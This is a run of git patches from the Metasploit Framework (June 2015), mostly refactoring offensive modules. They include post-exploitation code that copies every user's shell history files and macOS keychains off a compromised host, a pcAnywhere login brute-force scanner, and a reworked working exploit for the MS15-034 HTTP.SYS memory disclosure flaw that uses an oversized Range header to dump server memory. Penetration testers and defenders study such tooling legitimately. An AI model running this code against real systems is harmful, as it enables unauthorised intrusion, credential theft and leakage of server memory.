@@ -403,8 +394,8 @@ class Metasploit3 < Msf::Post
       users_folder = cmd_exec("/bin/ls","/Users").chomp
       current_user = cmd_exec("/usr/bin/id","-nu").chomp
     when /shell/
-      users_folder = session.shell_command_token("/bin/ls /Users").chomp
-      current_user = session.shell_command_token("/usr/bin/id -nu").chomp
+      users_folder = cmd_exec("/bin/ls /Users").chomp
+      current_user = cmd_exec("/usr/bin/id -nu").chomp
     end
     users_folder.each_line do |u|
       next if u.chomp =~ /Shared|\.localized/
@@ -415,12 +406,12 @@ class Metasploit3 < Msf::Post
     if current_user == "root"
 
       # Check the root user folder
-      root_folder = session.shell_command_token("/bin/ls -ma ~/").chomp.split(", ")
+      root_folder = cmd_exec("/bin/ls -ma ~/").chomp.split(", ")
       root_folder.each do |f|
         if f =~ /\.\w*\_history/
           print_status("\tHistory file #{f.strip} found for root")
           print_status("\tDownloading #{f.strip}")
-          sh_file = session.shell_command_token("/bin/cat ~/#{f.strip}")
+          sh_file = cmd_exec("/bin/cat ~/#{f.strip}")
 
           # Save data lo log folder
           file_local_write(log_folder+"//root_#{f.strip}.txt",sh_file)
@@ -431,12 +422,12 @@ class Metasploit3 < Msf::Post
       users.each do |u|
 
         # Lets get a list of all the files on the users folder and place them in an array
-        user_folder = session.shell_command_token("/bin/ls -ma /Users/#{u}/").chomp.split(", ")
+        user_folder = cmd_exec("/bin/ls -ma /Users/#{u}/").chomp.split(", ")
         user_folder.each do |f|
           if f =~ /\.\w*\_history/
             print_status("\tHistory file #{f.strip} found for #{u}")
             print_status("\tDownloading #{f.strip}")
-            sh_file = session.shell_command_token("/bin/cat /Users/#{u}/#{f.strip}")
+            sh_file = cmd_exec("/bin/cat /Users/#{u}/#{f.strip}")
 
             # Save data lo log folder
             file_local_write(log_folder+"//#{u}_#{f.strip}.txt",sh_file)
@@ -445,12 +436,12 @@ class Metasploit3 < Msf::Post
       end
 
     else
-      current_user_folder = session.shell_command_token("/bin/ls -ma ~/").chomp.split(", ")
+      current_user_folder = cmd_exec("/bin/ls -ma ~/").chomp.split(", ")
       current_user_folder.each do |f|
         if f =~ /\.\w*\_history/
           print_status("\tHistory file #{f.strip} found for #{current_user}")
           print_status("\tDownloading #{f.strip}")
-          sh_file = session.shell_command_token("/bin/cat ~/#{f.strip}")
+          sh_file = cmd_exec("/bin/cat ~/#{f.strip}")
 
           # Save data lo log folder
           file_local_write(log_folder+"//#{current_user}_#{f.strip}.txt",sh_file)
@@ -466,7 +457,7 @@ class Metasploit3 < Msf::Post
     when /meterpreter/
       users_folder = cmd_exec("/bin/ls","/Users").chomp
     when /shell/
-      users_folder = session.shell_command_token("/bin/ls /Users").chomp
+      users_folder = cmd_exec("/bin/ls /Users").chomp
     end
     users_folder.each_line do |u|
       next if u.chomp =~ /Shared|\.localized/
@@ -475,22 +466,22 @@ class Metasploit3 < Msf::Post
     if check_root
       users.each do |u|
         print_status("Enumerating and Downloading keychains for #{u}")
-        keychain_files = session.shell_command_token("/usr/bin/sudo -u #{u} -i /usr/bin/security list-keychains").split("\n")
+        keychain_files = cmd_exec("/usr/bin/sudo -u #{u} -i /usr/bin/security list-keychains").split("\n")
         keychain_files.each do |k|
 
-          keychain_file = session.shell_command_token("/bin/cat #{k.strip}")
+          keychain_file = cmd_exec("/bin/cat #{k.strip}")
 
           # Save data lo log folder
           file_local_write(log_folder+"//#{u}#{k.strip.gsub(/\W/,"_")}",keychain_file)
         end
       end
     else
-      current_user = session.shell_command_token("/usr/bin/id -nu").chomp
+      current_user = cmd_exec("/usr/bin/id -nu").chomp
       print_status("Enumerating and Downloading keychains for #{current_user}")
-      keychain_files = session.shell_command_token("usr/bin/security list-keychains").split("\n")
+      keychain_files = cmd_exec("usr/bin/security list-keychains").split("\n")
       keychain_files.each do |k|
 
-        keychain_file = session.shell_command_token("/bin/cat #{k.strip}")
+        keychain_file = cmd_exec("/bin/cat #{k.strip}")
 
         # Save data lo log folder
         file_local_write(log_folder+"//#{current_user}#{k.strip.gsub(/\W/,"_")}",keychain_file)

From c20d2a1dd9f9c9d58d3f18bd37f3a18dd714d2fe Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Mon, 22 Jun 2015 16:20:46 -0500
Subject: [PATCH 0507/1013] Update post/multi/gather/env

* Use cmd_exec
---
 modules/post/multi/gather/env.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/modules/post/multi/gather/env.rb b/modules/post/multi/gather/env.rb
index c4042f6ea8..34938cb19b 100644
--- a/modules/post/multi/gather/env.rb
+++ b/modules/post/multi/gather/env.rb
@@ -42,7 +42,7 @@ class Metasploit3 < Msf::Post
       @ltype = "unix.environment"
       cmd = "env"
     end
-    @output = session.shell_command_token(cmd)
+    @output = cmd_exec(cmd)
   end
 
   def get_env_meterpreter

From 6a0a410cad6ccfb44a31c085c4150a2cb5a45f76 Mon Sep 17 00:00:00 2001
From: Brent Cook <bcook@rapid7.com>
Date: Mon, 22 Jun 2015 16:56:16 -0500
Subject: [PATCH 0508/1013] fix minor issue typing 'transport remove'

meterpreter > transport remove
[-] Error running command transport: NoMethodError undefined method `end_with?' for nil:NilClass
---
 lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb
index 6fe12a4fb3..1ef513b186 100644
--- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb
+++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb
@@ -739,7 +739,7 @@ class Console::CommandDispatcher::Core
         print_error("Failed to add transport, please check the parameters")
       end
     when 'remove'
-      if !opts[:transport].end_with?('_tcp') && opts[:uri].nil?
+      if opts[:transport] && !opts[:transport].end_with?('_tcp') && opts[:uri].nil?
         print_error("HTTP/S transport specified without session URI")
         return
       end

From 9fea3d7a9c9bc276d25a34672a87c65ebb8d9395 Mon Sep 17 00:00:00 2001
From: Brent Cook <bcook@rapid7.com>
Date: Mon, 22 Jun 2015 16:56:54 -0500
Subject: [PATCH 0509/1013] update to metasploit-payloads 1.0.3

---
 Gemfile.lock                 | 4 ++--
 metasploit-framework.gemspec | 4 ++--
 2 files changed, 4 insertions(+), 4 deletions(-)

diff --git a/Gemfile.lock b/Gemfile.lock
index 20788623a7..c7d5318770 100644
--- a/Gemfile.lock
+++ b/Gemfile.lock
@@ -9,7 +9,7 @@ PATH
       json
       metasploit-concern (~> 1.0)
       metasploit-model (~> 1.0)
-      metasploit-payloads (= 1.0.2)
+      metasploit-payloads (= 1.0.3)
       msgpack
       nokogiri
       packetfu (= 1.1.9)
@@ -123,7 +123,7 @@ GEM
       activemodel (>= 4.0.9, < 4.1.0)
       activesupport (>= 4.0.9, < 4.1.0)
       railties (>= 4.0.9, < 4.1.0)
-    metasploit-payloads (1.0.2)
+    metasploit-payloads (1.0.3)
     metasploit_data_models (1.2.3)
       activerecord (>= 4.0.9, < 4.1.0)
       activesupport (>= 4.0.9, < 4.1.0)
diff --git a/metasploit-framework.gemspec b/metasploit-framework.gemspec
index 376f22f6b6..287a6afeaa 100644
--- a/metasploit-framework.gemspec
+++ b/metasploit-framework.gemspec
@@ -62,8 +62,8 @@ Gem::Specification.new do |spec|
   # Things that would normally be part of the database model, but which
   # are needed when there's no database
   spec.add_runtime_dependency 'metasploit-model', '~> 1.0'
-  # Needed for Meterpreter on Windows, soon others.
-  spec.add_runtime_dependency 'metasploit-payloads', '1.0.2'
+  # Needed for Meterpreter
+  spec.add_runtime_dependency 'metasploit-payloads', '1.0.3'
   # Needed by msfgui and other rpc components
   spec.add_runtime_dependency 'msgpack'
   # Needed by anemone crawler

From 8ade66027a55aef7311f3234bce063a48150bc2a Mon Sep 17 00:00:00 2001
From: Brent Cook <bcook@rapid7.com>
Date: Mon, 22 Jun 2015 17:19:02 -0500
Subject: [PATCH 0510/1013] update cached payload sizes

---
 modules/payloads/singles/windows/x64/meterpreter_bind_tcp.rb    | 2 +-
 .../payloads/singles/windows/x64/meterpreter_reverse_http.rb    | 2 +-
 .../payloads/singles/windows/x64/meterpreter_reverse_https.rb   | 2 +-
 .../singles/windows/x64/meterpreter_reverse_ipv6_tcp.rb         | 2 +-
 modules/payloads/singles/windows/x64/meterpreter_reverse_tcp.rb | 2 +-
 5 files changed, 5 insertions(+), 5 deletions(-)

diff --git a/modules/payloads/singles/windows/x64/meterpreter_bind_tcp.rb b/modules/payloads/singles/windows/x64/meterpreter_bind_tcp.rb
index 2ce61320a7..d9d1ffbe47 100644
--- a/modules/payloads/singles/windows/x64/meterpreter_bind_tcp.rb
+++ b/modules/payloads/singles/windows/x64/meterpreter_bind_tcp.rb
@@ -13,7 +13,7 @@ require 'rex/payloads/meterpreter/config'
 
 module Metasploit4
 
-  CachedSize = 1102898
+  CachedSize = 1104434
 
   include Msf::Payload::TransportConfig
   include Msf::Payload::Windows
diff --git a/modules/payloads/singles/windows/x64/meterpreter_reverse_http.rb b/modules/payloads/singles/windows/x64/meterpreter_reverse_http.rb
index 7dec0bec7b..e978b16c97 100644
--- a/modules/payloads/singles/windows/x64/meterpreter_reverse_http.rb
+++ b/modules/payloads/singles/windows/x64/meterpreter_reverse_http.rb
@@ -13,7 +13,7 @@ require 'rex/payloads/meterpreter/config'
 
 module Metasploit4
 
-  CachedSize = 1103942
+  CachedSize = 1105478
 
   include Msf::Payload::TransportConfig
   include Msf::Payload::Windows
diff --git a/modules/payloads/singles/windows/x64/meterpreter_reverse_https.rb b/modules/payloads/singles/windows/x64/meterpreter_reverse_https.rb
index 78d31e916a..45f9d53014 100644
--- a/modules/payloads/singles/windows/x64/meterpreter_reverse_https.rb
+++ b/modules/payloads/singles/windows/x64/meterpreter_reverse_https.rb
@@ -13,7 +13,7 @@ require 'rex/payloads/meterpreter/config'
 
 module Metasploit4
 
-  CachedSize = 1103942
+  CachedSize = 1105478
 
   include Msf::Payload::TransportConfig
   include Msf::Payload::Windows
diff --git a/modules/payloads/singles/windows/x64/meterpreter_reverse_ipv6_tcp.rb b/modules/payloads/singles/windows/x64/meterpreter_reverse_ipv6_tcp.rb
index c819611c57..f843d31260 100644
--- a/modules/payloads/singles/windows/x64/meterpreter_reverse_ipv6_tcp.rb
+++ b/modules/payloads/singles/windows/x64/meterpreter_reverse_ipv6_tcp.rb
@@ -13,7 +13,7 @@ require 'rex/payloads/meterpreter/config'
 
 module Metasploit4
 
-  CachedSize = 1102898
+  CachedSize = 1104434
 
   include Msf::Payload::TransportConfig
   include Msf::Payload::Windows
diff --git a/modules/payloads/singles/windows/x64/meterpreter_reverse_tcp.rb b/modules/payloads/singles/windows/x64/meterpreter_reverse_tcp.rb
index 3f534da845..3c0e1efce7 100644
--- a/modules/payloads/singles/windows/x64/meterpreter_reverse_tcp.rb
+++ b/modules/payloads/singles/windows/x64/meterpreter_reverse_tcp.rb
@@ -13,7 +13,7 @@ require 'rex/payloads/meterpreter/config'
 
 module Metasploit4
 
-  CachedSize = 1102898
+  CachedSize = 1104434
 
   include Msf::Payload::TransportConfig
   include Msf::Payload::Windows

From f216841d01af8f232e39ce85225024c33e594966 Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Mon, 22 Jun 2015 17:54:17 -0500
Subject: [PATCH 0511/1013] Update enum_vbox

---
 modules/post/multi/gather/enum_vbox.rb | 50 +++++++++++++++-----------
 1 file changed, 30 insertions(+), 20 deletions(-)

diff --git a/modules/post/multi/gather/enum_vbox.rb b/modules/post/multi/gather/enum_vbox.rb
index d5a4b2591f..283ffbfa7b 100644
--- a/modules/post/multi/gather/enum_vbox.rb
+++ b/modules/post/multi/gather/enum_vbox.rb
@@ -16,10 +16,10 @@ class Metasploit3 < Msf::Post
     super( update_info(info,
       'Name'           => 'Multi Gather VirtualBox VM Enumeration',
       'Description'    => %q{
-                This module will attempt to enumerate any VirtualBox VMs on the target machine.
-                Due to the nature of VirtualBox, this module can only enumerate VMs registered
-                for the current user, thereforce, this module needs to be invoked from a user context.
-                },
+        This module will attempt to enumerate any VirtualBox VMs on the target machine.
+        Due to the nature of VirtualBox, this module can only enumerate VMs registered
+        for the current user, thereforce, this module needs to be invoked from a user context.
+      },
       'License'        => MSF_LICENSE,
       'Author'         => ['theLightCosine'],
       'Platform'       => %w{ bsd linux osx unix win },
@@ -29,27 +29,37 @@ class Metasploit3 < Msf::Post
 
   def run
     if session.platform =~ /win/
-      res = session.shell_command_token_win32('"c:\Program Files\Oracle\VirtualBox\vboxmanage" list -l vms') || ''
-      if res.include? "The system cannot find the path specified"
-        print_error "VirtualBox does not appear to be installed on this machine"
-        return nil
-      elsif res == "\n"
-        print_status "VirtualBox is installed but this user has no VMs registered. Try another user."
-        return nil
+      if session.type == 'meterpreter'
+        begin
+          res = cmd_exec('c:\\Program Files\\Oracle\\VirtualBox\\vboxmanage', 'list -l vms')
+        rescue ::Rex::Post::Meterpreter::RequestError
+          print_error('VirtualBox does not appear to be installed on this machine')
+          return nil
+        end
+
+        if res.empty?
+          print_status('VirtualBox is installed but this user has no VMs registered. Try another user.')
+          return nil
+        end
+      else
+        res = cmd_exec('"c:\\Program Files\\Oracle\\VirtualBox\\vboxmanage" list -l vms')
+        if res.empty?
+          print_error('VirtualBox isn\'t installed or this user has no VMs registered')
+          return nil
+        end
       end
     elsif session.platform =~ /unix|linux|bsd|osx/
-      res = session.shell_command('vboxmanage list -l vms')
-      unless res.start_with? "Sun VirtualBox"
-        print_error "VirtualBox does not appear to be installed on this machine"
-        return nil
-      end
-      unless res.include? "Name:"
-        print_status "VirtualBox is installed but this user has no VMs registered. Try another user."
+      res = cmd_exec('vboxmanage list -l vms')
+
+      unless res.start_with?('Sun VirtualBox') || res.include?('Name:')
+        print_error('VirtualBox isn\'t installed or this user has no VMs registered')
         return nil
       end
     end
-    print_good res
-    store_loot('virtualbox_vms', "text/plain", session, res, "virtualbox_vms.txt", "Virtualbox Virtual Machines")
+
+    vprint_status(res)
+    store_path = store_loot('virtualbox_vms', "text/plain", session, res, "virtualbox_vms.txt", "Virtualbox Virtual Machines")
+    print_good("#{peer} - File successfully retrieved and saved on #{store_path}")
   end
 
 

From 8086a6f8cce290a30a2212ec159bc4a28e95f3d3 Mon Sep 17 00:00:00 2001
From: rwhitcroft <rw81junk@gmail.com>
Date: Mon, 22 Jun 2015 20:25:12 -0400
Subject: [PATCH 0512/1013] remove unnecessary begin/rescue, change print_* to
 vprint_* in check()

---
 .../scanner/http/ms15034_http_sys_memory_dump.rb   | 14 +++++---------
 1 file changed, 5 insertions(+), 9 deletions(-)

diff --git a/modules/auxiliary/scanner/http/ms15034_http_sys_memory_dump.rb b/modules/auxiliary/scanner/http/ms15034_http_sys_memory_dump.rb
index 0c367394c6..49c72a03c1 100644
--- a/modules/auxiliary/scanner/http/ms15034_http_sys_memory_dump.rb
+++ b/modules/auxiliary/scanner/http/ms15034_http_sys_memory_dump.rb
@@ -46,7 +46,7 @@ class Metasploit3 < Msf::Auxiliary
       }
     })
     unless res
-      print_error("Error in send_request_raw")
+      vprint_error("Error in send_request_raw")
       return false
     end
 
@@ -151,14 +151,10 @@ class Metasploit3 < Msf::Auxiliary
       loop do
         sleep 2
 
-        begin
-          buf = sock.get_once(-1, 2)
-          if buf
-            resp << buf
-          else
-            break
-          end
-        rescue
+        buf = sock.get_once(-1, 2)
+        if buf
+          resp << buf
+        else
           break
         end
       end

From e75287875b1fe54a35fc1b8bbb686d409f1bdbd7 Mon Sep 17 00:00:00 2001
From: Brent Cook <bcook@rapid7.com>
Date: Mon, 22 Jun 2015 20:41:58 -0500
Subject: [PATCH 0513/1013] hack android-specific commands back to life

---
 data/meterpreter/ext_server_android.jar      | 0
 lib/msf/base/sessions/meterpreter_android.rb | 7 +++++++
 lib/msf/base/sessions/meterpreter_options.rb | 6 ++++++
 3 files changed, 13 insertions(+)
 create mode 100644 data/meterpreter/ext_server_android.jar

diff --git a/data/meterpreter/ext_server_android.jar b/data/meterpreter/ext_server_android.jar
new file mode 100644
index 0000000000..e69de29bb2
diff --git a/lib/msf/base/sessions/meterpreter_android.rb b/lib/msf/base/sessions/meterpreter_android.rb
index 01080744d3..5728ddd036 100644
--- a/lib/msf/base/sessions/meterpreter_android.rb
+++ b/lib/msf/base/sessions/meterpreter_android.rb
@@ -19,6 +19,13 @@ class Meterpreter_Java_Android < Msf::Sessions::Meterpreter_Java_Java
     self.platform = 'java/android'
   end
 
+  def load_android
+    original = console.disable_output
+    console.disable_output = true
+    console.run_single('load android')
+    console.disable_output = original
+  end
+
 end
 
 end
diff --git a/lib/msf/base/sessions/meterpreter_options.rb b/lib/msf/base/sessions/meterpreter_options.rb
index b070950371..0d8c7b3b70 100644
--- a/lib/msf/base/sessions/meterpreter_options.rb
+++ b/lib/msf/base/sessions/meterpreter_options.rb
@@ -65,6 +65,12 @@ module MeterpreterOptions
         end
       end
 
+      if session.platform =~ /android/i
+        if datastore['AutoLoadAndroid']
+          session.load_android
+        end
+      end
+
       [ 'InitialAutoRunScript', 'AutoRunScript' ].each do |key|
         if (datastore[key].empty? == false)
           args = Shellwords.shellwords( datastore[key] )

From 302db36daaa7b9199d5b33a90d14fc8f6fd47a6d Mon Sep 17 00:00:00 2001
From: root <void-in@users.noreply.github.com>
Date: Tue, 23 Jun 2015 09:46:01 +0500
Subject: [PATCH 0514/1013] Add last_attempted_at to creds object

---
 modules/auxiliary/scanner/pcanywhere/pcanywhere_login.rb | 7 ++++---
 1 file changed, 4 insertions(+), 3 deletions(-)

diff --git a/modules/auxiliary/scanner/pcanywhere/pcanywhere_login.rb b/modules/auxiliary/scanner/pcanywhere/pcanywhere_login.rb
index 588236bf8f..d787bf7863 100644
--- a/modules/auxiliary/scanner/pcanywhere/pcanywhere_login.rb
+++ b/modules/auxiliary/scanner/pcanywhere/pcanywhere_login.rb
@@ -21,7 +21,7 @@ class Metasploit3 < Msf::Auxiliary
         report successful logins.
       },
       'Author'      => ['theLightCosine'],
-      'References'     =>
+      'References'  =>
         [
           [ 'CVE', '1999-0502'] # Weak password
         ],
@@ -49,7 +49,7 @@ class Metasploit3 < Msf::Auxiliary
           port: datastore['RPORT'],
           service_name: 'pcanywhere',
           user: user,
-          password: pass,
+          password: pass
         )
         return if datastore['STOP_ON_SUCCESS']
         print_status('Waiting to Re-Negotiate Connection (this may take a minute)...')
@@ -90,7 +90,8 @@ class Metasploit3 < Msf::Auxiliary
 
     login_data = {
       core: create_credential(credential_data),
-      status: Metasploit::Model::Login::Status::SUCCESSFUL,
+      last_attempted_at: DateTime.now,
+      status: Metasploit::Model::Login::Status::SUCCESSFUL
     }.merge(service_data)
 
     create_credential_login(login_data)

From e9b548e8a246073425aee2a56a3bb156f9ad8830 Mon Sep 17 00:00:00 2001
From: wchen-r7 <wei_chen@rapid7.com>
Date: Tue, 23 Jun 2015 01:07:33 -0500
Subject: [PATCH 0515/1013] Changes for ms15034_http_sys_memory_dump.rb

---
 .../http/ms15034_http_sys_memory_dump.rb      | 228 ++++++++++--------
 1 file changed, 131 insertions(+), 97 deletions(-)

diff --git a/modules/auxiliary/scanner/http/ms15034_http_sys_memory_dump.rb b/modules/auxiliary/scanner/http/ms15034_http_sys_memory_dump.rb
index 49c72a03c1..a759af70a4 100644
--- a/modules/auxiliary/scanner/http/ms15034_http_sys_memory_dump.rb
+++ b/modules/auxiliary/scanner/http/ms15034_http_sys_memory_dump.rb
@@ -11,9 +11,9 @@ class Metasploit3 < Msf::Auxiliary
   include Msf::Exploit::Remote::HttpClient
   include Msf::Auxiliary::Scanner
 
-  def initialize
-    super(
-      'Name'        => 'MS15-034 HTTP.SYS Memory Dump',
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'        => 'MS15-034 HTTP Protocol Stack Request Handling HTTP.SYS Memory Information Disclosure',
       'Description' => %q{
         Dumps memory contents using a crafted Range header. Affects only
         Windows 8.1, Server 2012, and Server 2012R2. Note that if the target
@@ -22,35 +22,91 @@ class Metasploit3 < Msf::Auxiliary
         seem stable. Using a larger target file should result in more memory
         being dumped, and SSL seems to produce more data as well.
       },
-      'Author'      => 'Rich Whitcroft <rwhitcroft[at]gmail.com>',
+      'Author'      =>
+        [
+          'Rich Whitcroft <rwhitcroft[at]gmail.com>', # Msf module
+          'sinn3r'                                    # Some more Metasploit stuff
+        ],
       'License'     => MSF_LICENSE,
-      'References'  => [ ['URL', 'http://securitysift.com/an-analysis-of-ms15-034/'] ]
-    )
+      'References'  =>
+        [
+          ['CVE', '2015-1635'],
+          ['MSB', 'MS15-034'],
+          ['URL', 'http://pastebin.com/ypURDPc4'],
+          ['URL', 'https://github.com/rapid7/metasploit-framework/pull/5150'],
+          ['URL', 'https://community.qualys.com/blogs/securitylabs/2015/04/20/ms15-034-analyze-and-remote-detection'],
+          ['URL', 'http://www.securitysift.com/an-analysis-of-ms15-034/'],
+          ['URL', 'http://securitysift.com/an-analysis-of-ms15-034/']
+        ]
+    ))
 
     register_options([
-      OptString.new('TARGET_URI', [ true, 'The path to the resource (must exist!)', '/iisstart.htm' ]),
-      OptInt.new('RPORT', [ true, 'The target port', 443 ]),
-      OptBool.new('SSL', [ true, 'Use SSL?', true ]),
+      OptString.new('TARGETURI', [false, 'URI to the site (e.g /site/) or a valid file resource (e.g /welcome.png)', '/']),
       OptBool.new('SUPPRESS_REQUEST', [ true, 'Suppress output of the requested resource', true ])
     ], self.class)
 
     deregister_options('VHOST')
   end
 
-  def check
-    res = send_request_raw({
-      'uri' => datastore['TARGET_URI'],
-      'method' => 'GET',
-      'headers' => {
-        'Range' => 'bytes=0-18446744073709551615'
-      }
-    })
-    unless res
-      vprint_error("Error in send_request_raw")
-      return false
+  def target_uri
+    @target_uri ||= super
+  end
+
+  def potential_static_files_uris
+    uri = normalize_uri(target_uri.path)
+
+    return [uri] unless uri[-1, 1] == '/'
+
+    uris = ["#{uri}iisstart.htm", "#{uri}iis-85.png", "#{uri}welcome.png"]
+    res  = send_request_raw('uri' => uri)
+
+    return uris unless res
+
+    site_uri = URI.parse(full_uri)
+    page     = Nokogiri::HTML(res.body.encode('UTF-8', invalid: :replace, undef: :replace))
+
+    page.xpath('//link|//script|//style|//img').each do |tag|
+      %w(href src).each do |attribute|
+        attr_value = tag[attribute]
+        next unless attr_value && !attr_value.empty?
+        uri = site_uri.merge(URI.encode(attr_value.strip))
+        next unless uri.host == vhost || uri.host == rhost
+        uris << uri.path if uri.path =~ /\.[a-z]{2,}$/i # Only keep path with a file
+      end
     end
 
-    return (res.body.include?("Requested Range Not Satisfiable") ? true : false)
+    uris.uniq
+  end
+
+  def check_host(ip)
+    upper_range = 0xFFFFFFFFFFFFFFFF
+
+    potential_static_files_uris.each do |potential_uri|
+      uri = normalize_uri(potential_uri)
+
+      res = send_request_raw(
+        'uri' => uri,
+        'method' => 'GET',
+        'headers' => {
+          'Range' => "bytes=0-#{upper_range}"
+        }
+      )
+
+      vmessage = "#{peer} - Checking #{uri} [#{res.code}]"
+
+      if res && res.body.include?('Requested Range Not Satisfiable')
+        vprint_status("#{vmessage} - Vulnerable")
+
+        # Save the file that we want to use for the information leak
+        target_uri.path = uri
+
+        return Exploit::CheckCode::Vulnerable
+      elsif res && res.body.include?('The request has an invalid header name')
+        return Exploit::CheckCode::Safe
+      end
+    end
+
+    Exploit::CheckCode::Unknown
   end
 
   def dump(data)
@@ -64,108 +120,86 @@ class Metasploit3 < Msf::Auxiliary
       end
     end
 
-    i = 1
-    bytes_per_line = 16
-    lines_suppressed = 0
-    bytes = String.new
-    chars = String.new
-
+    print_line
     print_good("Memory contents:")
+    print_line(Rex::Text.to_hex_dump(data))
+  end
 
-    data.each_byte do |b|
-      bytes << "%02x" % b.ord
+  # Needed to allow the vulnerable uri to be shared between the #check and #dos
+  def target_uri
+    @target_uri ||= super
+  end
 
-      if b.ord.between?(32, 126)
-        chars << b.chr
-      else
-        chars << "."
+  def get_file_size
+    @file_size ||= lambda {
+      file_size = -1
+      uri = normalize_uri(target_uri.path)
+      res = send_request_raw('uri' => uri)
+
+      unless res
+        vprint_error("#{peer} - Connection timed out")
+        return file_size
       end
 
-      if i > 1 and i % bytes_per_line == 0
-        if bytes !~ /^[0f]{32}$/
-          bytes.gsub!(/(.{4})/, '\1 ')
-          print_status("#{bytes}   #{chars}")
-        else
-          lines_suppressed += 1
-        end
-
-        bytes.clear
-        chars.clear
+      if res.code == 404
+        vprint_error("#{peer} - You got a 404. URI must be a valid resource.")
+        return file_size
       end
 
-      i += 1
+      file_size = res.headers['Content-Length'].to_i
+      vprint_status("#{peer} - File length: #{file_size} bytes")
+
+      return file_size
+    }.call
+  end
+
+  def calc_ranges(content_length)
+    ranges = "bytes=3-18446744073709551615"
+
+    range_step = 100
+    for range_start in (1..content_length).step(range_step) do
+      range_end = range_start + range_step - 1
+      range_end = content_length if range_end > content_length
+      ranges << ",#{range_start}-#{range_end}"
     end
 
-    print_status("Suppressed #{lines_suppressed} uninteresting lines") unless lines_suppressed.zero?
+    ranges
   end
 
   def run_host(ip)
     begin
-      unless check
+      unless check_host(ip)
         print_error("Target is not vulnerable")
         return
       else
         print_good("Target may be vulnerable...")
       end
 
-      # determine the size of the resource
-      res = send_request_raw({ 'uri' => datastore['TARGET_URI'], 'method' => 'GET' })
-      unless res
-        print_error("Error in send_request_raw")
-        return
-      end
+      content_length = get_file_size
+      ranges = calc_ranges(content_length)
 
-      if res.code == 200
-        content_length = res.headers['Content-Length'].to_i
-        print_good("Content length is #{content_length} bytes")
-      else
-        print_error("Error: HTTP code #{res.code}")
-        return
-      end
-
-      # build the Range header
-      ranges = "bytes=3-18446744073709551615"
-      range_step = 100
-      for range_start in (1..content_length).step(range_step) do
-        range_end = range_start + range_step - 1
-        range_end = content_length if range_end > content_length
-        ranges << ",#{range_start}-#{range_end}"
-      end
-
-      sock_opts = {
-        'SSL' => datastore['SSL'],
-        'SSLVersion' => datastore['SSLVersion'],
-        'LocalHost' => nil,
-        'PeerHost' => ip,
-        'PeerPort' => datastore['RPORT']
-      }
-
-      sock = Rex::Socket::Tcp.create(sock_opts)
-
-      req = "GET #{datastore['TARGET_URI']} HTTP/1.1\r\nHost: #{ip}\r\nUser-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)\r\nAccept: */*\r\nConnection: keep-alive\r\nRange: #{ranges}\r\n\r\n"
-      sock.put(req)
+      uri = normalize_uri(target_uri.path)
+      cli = Rex::Proto::Http::Client.new(ip)
+      cli.connect
+      req = cli.request_raw(
+        'uri' => target_uri.path,
+        'method' => 'GET',
+        'headers' => {
+        'Range' => ranges
+        }
+      )
+      cli.send_request(req)
 
       print_good("Stand by...")
 
-      resp = String.new
-      loop do
-        sleep 2
+      resp = cli.read_response
 
-        buf = sock.get_once(-1, 2)
-        if buf
-          resp << buf
-        else
-          break
-        end
-      end
-
-      if resp and not resp.empty?
-        dump(resp)
+      if resp
+        dump(resp.to_s)
         loot_path = store_loot('iis.ms15034', 'application/octet-stream', ip, resp, nil, 'MS15-034 HTTP.SYS Memory Dump')
         print_status("Memory dump saved to #{loot_path}")
       else
-        print_error("Target does not appear to be vulnerable (must be 8.1, 2012, or 2012R2)")
-        return
+        print_error("Disclosure unsuccessful (must be 8.1, 2012, or 2012R2)")
       end
     rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
       print_error("Unable to connect")
@@ -174,7 +208,7 @@ class Metasploit3 < Msf::Auxiliary
       print_error("Timeout receiving from socket")
       return
     ensure
-      sock.close if sock
+      cli.close if cli
     end
   end
 end

From 8ce5cc23cf1dc8dddcd421f2773bea970882c010 Mon Sep 17 00:00:00 2001
From: wchen-r7 <wei_chen@rapid7.com>
Date: Tue, 23 Jun 2015 01:08:34 -0500
Subject: [PATCH 0516/1013] More consistent filename style

---
 ...4_http_sys_memory_dump.rb => ms15_034_http_sys_memory_dump.rb} | 0
 1 file changed, 0 insertions(+), 0 deletions(-)
 rename modules/auxiliary/scanner/http/{ms15034_http_sys_memory_dump.rb => ms15_034_http_sys_memory_dump.rb} (100%)

diff --git a/modules/auxiliary/scanner/http/ms15034_http_sys_memory_dump.rb b/modules/auxiliary/scanner/http/ms15_034_http_sys_memory_dump.rb
similarity index 100%
rename from modules/auxiliary/scanner/http/ms15034_http_sys_memory_dump.rb
rename to modules/auxiliary/scanner/http/ms15_034_http_sys_memory_dump.rb

From 6127b8a0377691d198d8c158764b56d1b34ab0d4 Mon Sep 17 00:00:00 2001
From: wchen-r7 <wei_chen@rapid7.com>
Date: Tue, 23 Jun 2015 01:23:01 -0500
Subject: [PATCH 0517/1013] Pass user-agent

---
 .../scanner/http/ms15_034_http_sys_memory_dump.rb    | 12 +++++++++++-
 1 file changed, 11 insertions(+), 1 deletion(-)

diff --git a/modules/auxiliary/scanner/http/ms15_034_http_sys_memory_dump.rb b/modules/auxiliary/scanner/http/ms15_034_http_sys_memory_dump.rb
index a759af70a4..e3fa94d1aa 100644
--- a/modules/auxiliary/scanner/http/ms15_034_http_sys_memory_dump.rb
+++ b/modules/auxiliary/scanner/http/ms15_034_http_sys_memory_dump.rb
@@ -179,7 +179,17 @@ class Metasploit3 < Msf::Auxiliary
       ranges = calc_ranges(content_length)
 
       uri = normalize_uri(target_uri.path)
-      cli = Rex::Proto::Http::Client.new(ip)
+      cli = Rex::Proto::Http::Client.new(
+        ip,
+        rport,
+        {},
+        datastore['SSL'],
+        datastore['SSLVersion'],
+        nil,
+        datastore['USERNAME'],
+        datastore['PASSWORD']
+      )
+      cli.set_config('agent' => datastore['UserAgent'])
       cli.connect
